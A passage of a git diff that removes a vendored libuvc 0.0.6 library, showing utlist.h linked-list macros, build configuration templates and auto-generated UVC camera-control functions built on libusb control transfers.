-            _ls_e = _ls_p; _SV(_ls_p,list); _ls_p = _NEXT(_ls_p,list); _RS(list); _ls_psize--; \
-          } else if (cmp(_ls_p,_ls_q) <= 0) {                                                  \
-            _ls_e = _ls_p; _SV(_ls_p,list); _ls_p = _NEXT(_ls_p,list); _RS(list); _ls_psize--; \
-          } else {                                                                             \
-            _ls_e = _ls_q; _SV(_ls_q,list); _ls_q = _NEXT(_ls_q,list); _RS(list); _ls_qsize--; \
-          }                                                                                    \
-          if (_ls_tail) {                                                                      \
-            _SV(_ls_tail,list); _NEXTASGN(_ls_tail,list,_ls_e); _RS(list);                     \
-          } else {                                                                             \
-            _CASTASGN(list,_ls_e);                                                             \
-          }                                                                                    \
-          _SV(_ls_e,list); _PREVASGN(_ls_e,list,_ls_tail); _RS(list);                          \
-          _ls_tail = _ls_e;                                                                    \
-        }                                                                                      \
-        _ls_p = _ls_q;                                                                         \
-      }                                                                                        \
-      _CASTASGN(list->prev, _ls_tail);                                                         \
-      _SV(_ls_tail,list); _NEXTASGN(_ls_tail,list,NULL); _RS(list);                            \
-      if (_ls_nmerges <= 1) {                                                                  \
-        _ls_looping=0;                                                                         \
-      }                                                                                        \
-      _ls_insize *= 2;                                                                         \
-    }                                                                                          \
-  } else _tmp=NULL; /* quiet gcc unused variable warning */                                    \
-} while (0)
-
-#define CDL_SORT(list, cmp)                                                                    \
-do {                                                                                           \
-  LDECLTYPE(list) _ls_p;                                                                       \
-  LDECLTYPE(list) _ls_q;                                                                       \
-  LDECLTYPE(list) _ls_e;                                                                       \
-  LDECLTYPE(list) _ls_tail;                                                                    \
-  LDECLTYPE(list) _ls_oldhead;                                                                 \
-  LDECLTYPE(list) _tmp;                                                                        \
-  LDECLTYPE(list) _tmp2;                                                                       \
-  int _ls_insize, _ls_nmerges, _ls_psize, _ls_qsize, _ls_i, _ls_looping;                       \
-  if (list) {                                                                                  \
-    _ls_insize = 1;                                                                            \
-    _ls_looping = 1;                                                                           \
-    while (_ls_looping) {                                                                      \
-      _CASTASGN(_ls_p,list);                                                                   \
-      _CASTASGN(_ls_oldhead,list);                                                             \
-      list = NULL;                                                                             \
-      _ls_tail = NULL;                                                                         \
-      _ls_nmerges = 0;                                                                         \
-      while (_ls_p) {                                                                          \
-        _ls_nmerges++;                                                                         \
-        _ls_q = _ls_p;                                                                         \
-        _ls_psize = 0;                                                                         \
-        for (_ls_i = 0; _ls_i < _ls_insize; _ls_i++) {                                         \
-          _ls_psize++;                                                                         \
-          _SV(_ls_q,list);                                                                     \
-          if (_NEXT(_ls_q,list) == _ls_oldhead) {                                              \
-            _ls_q = NULL;                                                                      \
-          } else {                                                                             \
-            _ls_q = _NEXT(_ls_q,list);                                                         \
-          }                                                                                    \
-          _RS(list);                                                                           \
-          if (!_ls_q) break;                                                                   \
-        }                                                                                      \
-        _ls_qsize = _ls_insize;                                                                \
-        while (_ls_psize > 0 || (_ls_qsize > 0 && _ls_q)) {                                    \
-          if (_ls_psize == 0) {                                                                \
-            _ls_e = _ls_q; _SV(_ls_q,list); _ls_q = _NEXT(_ls_q,list); _RS(list); _ls_qsize--; \
-            if (_ls_q == _ls_oldhead) { _ls_q = NULL; }                                        \
-          } else if (_ls_qsize == 0 || !_ls_q) {                                               \
-            _ls_e = _ls_p; _SV(_ls_p,list); _ls_p = _NEXT(_ls_p,list); _RS(list); _ls_psize--; \
-            if (_ls_p == _ls_oldhead) { _ls_p = NULL; }                                        \
-          } else if (cmp(_ls_p,_ls_q) <= 0) {                                                  \
-            _ls_e = _ls_p; _SV(_ls_p,list); _ls_p = _NEXT(_ls_p,list); _RS(list); _ls_psize--; \
-            if (_ls_p == _ls_oldhead) { _ls_p = NULL; }                                        \
-          } else {                                                                             \
-            _ls_e = _ls_q; _SV(_ls_q,list); _ls_q = _NEXT(_ls_q,list); _RS(list); _ls_qsize--; \
-            if (_ls_q == _ls_oldhead) { _ls_q = NULL; }                                        \
-          }                                                                                    \
-          if (_ls_tail) {                                                                      \
-            _SV(_ls_tail,list); _NEXTASGN(_ls_tail,list,_ls_e); _RS(list);                     \
-          } else {                                                                             \
-            _CASTASGN(list,_ls_e);                                                             \
-          }                                                                                    \
-          _SV(_ls_e,list); _PREVASGN(_ls_e,list,_ls_tail); _RS(list);                          \
-          _ls_tail = _ls_e;                                                                    \
-        }                                                                                      \
-        _ls_p = _ls_q;                                                                         \
-      }                                                                                        \
-      _CASTASGN(list->prev,_ls_tail);                                                          \
-      _CASTASGN(_tmp2,list);                                                                   \
-      _SV(_ls_tail,list); _NEXTASGN(_ls_tail,list,_tmp2); _RS(list);                           \
-      if (_ls_nmerges <= 1) {                                                                  \
-        _ls_looping=0;                                                                         \
-      }                                                                                        \
-      _ls_insize *= 2;                                                                         \
-    }                                                                                          \
-  } else _tmp=NULL; /* quiet gcc unused variable warning */                                    \
-} while (0)
-
-/******************************************************************************
- * singly linked list macros (non-circular)                                   *
- *****************************************************************************/
-#define LL_PREPEND(head,add)                                                                   \
-do {                                                                                           \
-  (add)->next = head;                                                                          \
-  head = add;                                                                                  \
-} while (0)
-
-#define LL_APPEND(head,add)                                                                    \
-do {                                                                                           \
-  LDECLTYPE(head) _tmp;                                                                        \
-  (add)->next=NULL;                                                                            \
-  if (head) {                                                                                  \
-    _tmp = head;                                                                               \
-    while (_tmp->next) { _tmp = _tmp->next; }                                                  \
-    _tmp->next=(add);                                                                          \
-  } else {                                                                                     \
-    (head)=(add);                                                                              \
-  }                                                                                            \
-} while (0)
-
-#define LL_DELETE(head,del)                                                                    \
-do {                                                                                           \
-  LDECLTYPE(head) _tmp;                                                                        \
-  if ((head) == (del)) {                                                                       \
-    (head)=(head)->next;                                                                       \
-  } else {                                                                                     \
-    _tmp = head;                                                                               \
-    while (_tmp->next && (_tmp->next != (del))) {                                              \
-      _tmp = _tmp->next;                                                                       \
-    }                                                                                          \
-    if (_tmp->next) {                                                                          \
-      _tmp->next = ((del)->next);                                                              \
-    }                                                                                          \
-  }                                                                                            \
-} while (0)
-
-/* Here are VS2008 replacements for LL_APPEND and LL_DELETE */
-#define LL_APPEND_VS2008(head,add)                                                             \
-do {                                                                                           \
-  if (head) {                                                                                  \
-    (add)->next = head;     /* use add->next as a temp variable */                             \
-    while ((add)->next->next) { (add)->next = (add)->next->next; }                             \
-    (add)->next->next=(add);                                                                   \
-  } else {                                                                                     \
-    (head)=(add);                                                                              \
-  }                                                                                            \
-  (add)->next=NULL;                                                                            \
-} while (0)
-
-#define LL_DELETE_VS2008(head,del)                                                             \
-do {                                                                                           \
-  if ((head) == (del)) {                                                                       \
-    (head)=(head)->next;                                                                       \
-  } else {                                                                                     \
-    char *_tmp = (char*)(head);                                                                \
-    while (head->next && (head->next != (del))) {                                              \
-      head = head->next;                                                                       \
-    }                                                                                          \
-    if (head->next) {                                                                          \
-      head->next = ((del)->next);                                                              \
-    }                                                                                          \
-    {                                                                                          \
-      char **_head_alias = (char**)&(head);                                                    \
-      *_head_alias = _tmp;                                                                     \
-    }                                                                                          \
-  }                                                                                            \
-} while (0)
-#ifdef NO_DECLTYPE
-#undef LL_APPEND
-#define LL_APPEND LL_APPEND_VS2008
-#undef LL_DELETE
-#define LL_DELETE LL_DELETE_VS2008
-#endif
-/* end VS2008 replacements */
-
-#define LL_FOREACH(head,el)                                                                    \
-    for(el=head;el;el=el->next)
-
-#define LL_FOREACH_SAFE(head,el,tmp)                                                           \
-  for((el)=(head);(el) && (tmp = (el)->next, 1); (el) = tmp)
-
-#define LL_SEARCH_SCALAR(head,out,field,val)                                                   \
-do {                                                                                           \
-    LL_FOREACH(head,out) {                                                                     \
-      if ((out)->field == (val)) break;                                                        \
-    }                                                                                          \
-} while(0) 
-
-#define LL_SEARCH(head,out,elt,cmp)                                                            \
-do {                                                                                           \
-    LL_FOREACH(head,out) {                                                                     \
-      if ((cmp(out,elt))==0) break;                                                            \
-    }                                                                                          \
-} while(0) 
-
-/******************************************************************************
- * doubly linked list macros (non-circular)                                   *
- *****************************************************************************/
-#define DL_PREPEND(head,add)                                                                   \
-do {                                                                                           \
- (add)->next = head;                                                                           \
- if (head) {                                                                                   \
-   (add)->prev = (head)->prev;                                                                 \
-   (head)->prev = (add);                                                                       \
- } else {                                                                                      \
-   (add)->prev = (add);                                                                        \
- }                                                                                             \
- (head) = (add);                                                                               \
-} while (0)
-
-#define DL_APPEND(head,add)                                                                    \
-do {                                                                                           \
-  if (head) {                                                                                  \
-      (add)->prev = (head)->prev;                                                              \
-      (head)->prev->next = (add);                                                              \
-      (head)->prev = (add);                                                                    \
-      (add)->next = NULL;                                                                      \
-  } else {                                                                                     \
-      (head)=(add);                                                                            \
-      (head)->prev = (head);                                                                   \
-      (head)->next = NULL;                                                                     \
-  }                                                                                            \
-} while (0);
-
-#define DL_DELETE(head,del)                                                                    \
-do {                                                                                           \
-  if ((del)->prev == (del)) {                                                                  \
-      (head)=NULL;                                                                             \
-  } else if ((del)==(head)) {                                                                  \
-      (del)->next->prev = (del)->prev;                                                         \
-      (head) = (del)->next;                                                                    \
-  } else {                                                                                     \
-      (del)->prev->next = (del)->next;                                                         \
-      if ((del)->next) {                                                                       \
-          (del)->next->prev = (del)->prev;                                                     \
-      } else {                                                                                 \
-          (head)->prev = (del)->prev;                                                          \
-      }                                                                                        \
-  }                                                                                            \
-} while (0);
-
-
-#define DL_FOREACH(head,el)                                                                    \
-    for(el=head;el;el=el->next)
-
-/* this version is safe for deleting the elements during iteration */
-#define DL_FOREACH_SAFE(head,el,tmp)                                                           \
-  for((el)=(head);(el) && (tmp = (el)->next, 1); (el) = tmp)
-
-/* these are identical to their singly-linked list counterparts */
-#define DL_SEARCH_SCALAR LL_SEARCH_SCALAR
-#define DL_SEARCH LL_SEARCH
-
-/******************************************************************************
- * circular doubly linked list macros                                         *
- *****************************************************************************/
-#define CDL_PREPEND(head,add)                                                                  \
-do {                                                                                           \
- if (head) {                                                                                   \
-   (add)->prev = (head)->prev;                                                                 \
-   (add)->next = (head);                                                                       \
-   (head)->prev = (add);                                                                       \
-   (add)->prev->next = (add);                                                                  \
- } else {                                                                                      \
-   (add)->prev = (add);                                                                        \
-   (add)->next = (add);                                                                        \
- }                                                                                             \
-(head)=(add);                                                                                  \
-} while (0)
-
-#define CDL_DELETE(head,del)                                                                   \
-do {                                                                                           \
-  if ( ((head)==(del)) && ((head)->next == (head))) {                                          \
-      (head) = 0L;                                                                             \
-  } else {                                                                                     \
-     (del)->next->prev = (del)->prev;                                                          \
-     (del)->prev->next = (del)->next;                                                          \
-     if ((del) == (head)) (head)=(del)->next;                                                  \
-  }                                                                                            \
-} while (0);
-
-#define CDL_FOREACH(head,el)                                                                   \
-    for(el=head;el;el=(el->next==head ? 0L : el->next)) 
-
-#define CDL_FOREACH_SAFE(head,el,tmp1,tmp2)                                                    \
-  for((el)=(head), ((tmp1)=(head)?((head)->prev):NULL);                                        \
-      (el) && ((tmp2)=(el)->next, 1);                                                          \
-      ((el) = (((el)==(tmp1)) ? 0L : (tmp2))))
-
-#define CDL_SEARCH_SCALAR(head,out,field,val)                                                  \
-do {                                                                                           \
-    CDL_FOREACH(head,out) {                                                                    \
-      if ((out)->field == (val)) break;                                                        \
-    }                                                                                          \
-} while(0) 
-
-#define CDL_SEARCH(head,out,elt,cmp)                                                           \
-do {                                                                                           \
-    CDL_FOREACH(head,out) {                                                                    \
-      if ((cmp(out,elt))==0) break;                                                            \
-    }                                                                                          \
-} while(0) 
-
-#endif /* UTLIST_H */
-
diff --git a/thirdparty/libuvc-0.0.6/libuvc.pc.in b/thirdparty/libuvc-0.0.6/libuvc.pc.in
deleted file mode 100644
index 4f7adb8..0000000
--- a/thirdparty/libuvc-0.0.6/libuvc.pc.in
+++ /dev/null
@@ -1,11 +0,0 @@
-libdir=@CONF_LIBRARY_DIR@
-includedir=@CONF_INCLUDE_DIR@
-
-Name: libuvc
-Description: @libuvc_DESCRIPTION@
-URL: @libuvc_URL@
-Version: @libuvc_VERSION@
-Libs: -L${libdir} -luvc
-Libs.private: -lusb-1.0
-Cflags: -I${includedir}
-Requires: libusb-1.0
diff --git a/thirdparty/libuvc-0.0.6/libuvcConfig.cmake.in b/thirdparty/libuvc-0.0.6/libuvcConfig.cmake.in
deleted file mode 100644
index e5b0cae..0000000
--- a/thirdparty/libuvc-0.0.6/libuvcConfig.cmake.in
+++ /dev/null
@@ -1,3 +0,0 @@
-# - Config file for the libuvc package
-set(libuvc_INCLUDE_DIRS "@CONF_INCLUDE_DIR@")
-set(libuvc_LIBRARIES "@CONF_LIBRARY@")
diff --git a/thirdparty/libuvc-0.0.6/libuvcConfigVersion.cmake.in b/thirdparty/libuvc-0.0.6/libuvcConfigVersion.cmake.in
deleted file mode 100644
index 00ff766..0000000
--- a/thirdparty/libuvc-0.0.6/libuvcConfigVersion.cmake.in
+++ /dev/null
@@ -1,11 +0,0 @@
-set(PACKAGE_VERSION "@libuvc_VERSION@")
-
-# Check whether the requested PACKAGE_FIND_VERSION is compatible
-if("${PACKAGE_VERSION}" VERSION_LESS "${PACKAGE_FIND_VERSION}")
-  set(PACKAGE_VERSION_COMPATIBLE FALSE)
-else()
-  set(PACKAGE_VERSION_COMPATIBLE TRUE)
-  if ("${PACKAGE_VERSION}" VERSION_EQUAL "${PACKAGE_FIND_VERSION}")
-    set(PACKAGE_VERSION_EXACT TRUE)
-  endif()
-endif()
diff --git a/thirdparty/libuvc-0.0.6/src/ctrl-gen.c b/thirdparty/libuvc-0.0.6/src/ctrl-gen.c
deleted file mode 100644
index 30c0ab6..0000000
--- a/thirdparty/libuvc-0.0.6/src/ctrl-gen.c
+++ /dev/null
@@ -1,2259 +0,0 @@
-/* This is an AUTO-GENERATED file! Update it with the output of `ctrl-gen.py def`. */
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-
-static const int REQ_TYPE_SET = 0x21;
-static const int REQ_TYPE_GET = 0xa1;
-
-/** @ingroup ctrl
- * @brief Reads the SCANNING_MODE control.
- * @param devh UVC device handle
- * @param[out] mode 0: interlaced, 1: progressive
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_scanning_mode(uvc_device_handle_t *devh, uint8_t* mode, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_SCANNING_MODE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *mode = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the SCANNING_MODE control.
- * @param devh UVC device handle
- * @param mode 0: interlaced, 1: progressive
- */
-uvc_error_t uvc_set_scanning_mode(uvc_device_handle_t *devh, uint8_t mode) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = mode;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_SCANNING_MODE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads camera's auto-exposure mode.
- * 
- * See uvc_set_ae_mode() for a description of the available modes.
- * @param devh UVC device handle
- * @param[out] mode 1: manual mode; 2: auto mode; 4: shutter priority mode; 8: aperture priority mode
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_ae_mode(uvc_device_handle_t *devh, uint8_t* mode, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_AE_MODE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *mode = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets camera's auto-exposure mode.
- * 
- * Cameras may support any of the following AE modes:
- *  * UVC_AUTO_EXPOSURE_MODE_MANUAL (1) - manual exposure time, manual iris
- *  * UVC_AUTO_EXPOSURE_MODE_AUTO (2) - auto exposure time, auto iris
- *  * UVC_AUTO_EXPOSURE_MODE_SHUTTER_PRIORITY (4) - manual exposure time, auto iris
- *  * UVC_AUTO_EXPOSURE_MODE_APERTURE_PRIORITY (8) - auto exposure time, manual iris
- * 
- * Most cameras provide manual mode and aperture priority mode.
- * @param devh UVC device handle
- * @param mode 1: manual mode; 2: auto mode; 4: shutter priority mode; 8: aperture priority mode
- */
-uvc_error_t uvc_set_ae_mode(uvc_device_handle_t *devh, uint8_t mode) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = mode;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_AE_MODE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Checks whether the camera may vary the frame rate for exposure control reasons.
- * See uvc_set_ae_priority() for a description of the `priority` field.
- * @param devh UVC device handle
- * @param[out] priority 0: frame rate must remain constant; 1: frame rate may be varied for AE purposes
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_ae_priority(uvc_device_handle_t *devh, uint8_t* priority, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_AE_PRIORITY_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *priority = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Chooses whether the camera may vary the frame rate for exposure control reasons.
- * A `priority` value of zero means the camera may not vary its frame rate. A value of 1
- * means the frame rate is variable. This setting has no effect outside of the `auto` and
- * `shutter_priority` auto-exposure modes.
- * @param devh UVC device handle
- * @param priority 0: frame rate must remain constant; 1: frame rate may be varied for AE purposes
- */
-uvc_error_t uvc_set_ae_priority(uvc_device_handle_t *devh, uint8_t priority) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = priority;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_AE_PRIORITY_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Gets the absolute exposure time.
- * 
- * See uvc_set_exposure_abs() for a description of the `time` field.
- * @param devh UVC device handle
- * @param[out] time 
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_exposure_abs(uvc_device_handle_t *devh, uint32_t* time, enum uvc_req_code req_code) {
-  uint8_t data[4];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_EXPOSURE_TIME_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *time = DW_TO_INT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the absolute exposure time.
- * 
- * The `time` parameter should be provided in units of 0.0001 seconds (e.g., use the value 100
- * for a 10ms exposure period). Auto exposure should be set to `manual` or `shutter_priority`
- * before attempting to change this setting.
- * @param devh UVC device handle
- * @param time 
- */
-uvc_error_t uvc_set_exposure_abs(uvc_device_handle_t *devh, uint32_t time) {
-  uint8_t data[4];
-  uvc_error_t ret;
-
-  INT_TO_DW(time, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_EXPOSURE_TIME_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the exposure time relative to the current setting.
- * @param devh UVC device handle
- * @param[out] step number of steps by which to change the exposure time, or zero to set the default exposure time
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_exposure_rel(uvc_device_handle_t *devh, int8_t* step, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_EXPOSURE_TIME_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *step = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the exposure time relative to the current setting.
- * @param devh UVC device handle
- * @param step number of steps by which to change the exposure time, or zero to set the default exposure time
- */
-uvc_error_t uvc_set_exposure_rel(uvc_device_handle_t *devh, int8_t step) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = step;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_EXPOSURE_TIME_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the distance at which an object is optimally focused.
- * @param devh UVC device handle
- * @param[out] focus focal target distance in millimeters
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_focus_abs(uvc_device_handle_t *devh, uint16_t* focus, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_FOCUS_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *focus = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the distance at which an object is optimally focused.
- * @param devh UVC device handle
- * @param focus focal target distance in millimeters
- */
-uvc_error_t uvc_set_focus_abs(uvc_device_handle_t *devh, uint16_t focus) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(focus, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_FOCUS_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the FOCUS_RELATIVE control.
- * @param devh UVC device handle
- * @param[out] focus_rel TODO
- * @param[out] speed TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_focus_rel(uvc_device_handle_t *devh, int8_t* focus_rel, uint8_t* speed, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_FOCUS_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *focus_rel = data[0];
-    *speed = data[1];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the FOCUS_RELATIVE control.
- * @param devh UVC device handle
- * @param focus_rel TODO
- * @param speed TODO
- */
-uvc_error_t uvc_set_focus_rel(uvc_device_handle_t *devh, int8_t focus_rel, uint8_t speed) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  data[0] = focus_rel;
-  data[1] = speed;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_FOCUS_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the FOCUS_SIMPLE control.
- * @param devh UVC device handle
- * @param[out] focus TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_focus_simple_range(uvc_device_handle_t *devh, uint8_t* focus, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_FOCUS_SIMPLE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *focus = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the FOCUS_SIMPLE control.
- * @param devh UVC device handle
- * @param focus TODO
- */
-uvc_error_t uvc_set_focus_simple_range(uvc_device_handle_t *devh, uint8_t focus) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = focus;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_FOCUS_SIMPLE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the FOCUS_AUTO control.
- * @param devh UVC device handle
- * @param[out] state TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_focus_auto(uvc_device_handle_t *devh, uint8_t* state, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_FOCUS_AUTO_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *state = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the FOCUS_AUTO control.
- * @param devh UVC device handle
- * @param state TODO
- */
-uvc_error_t uvc_set_focus_auto(uvc_device_handle_t *devh, uint8_t state) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = state;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_FOCUS_AUTO_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the IRIS_ABSOLUTE control.
- * @param devh UVC device handle
- * @param[out] iris TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_iris_abs(uvc_device_handle_t *devh, uint16_t* iris, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_IRIS_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *iris = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the IRIS_ABSOLUTE control.
- * @param devh UVC device handle
- * @param iris TODO
- */
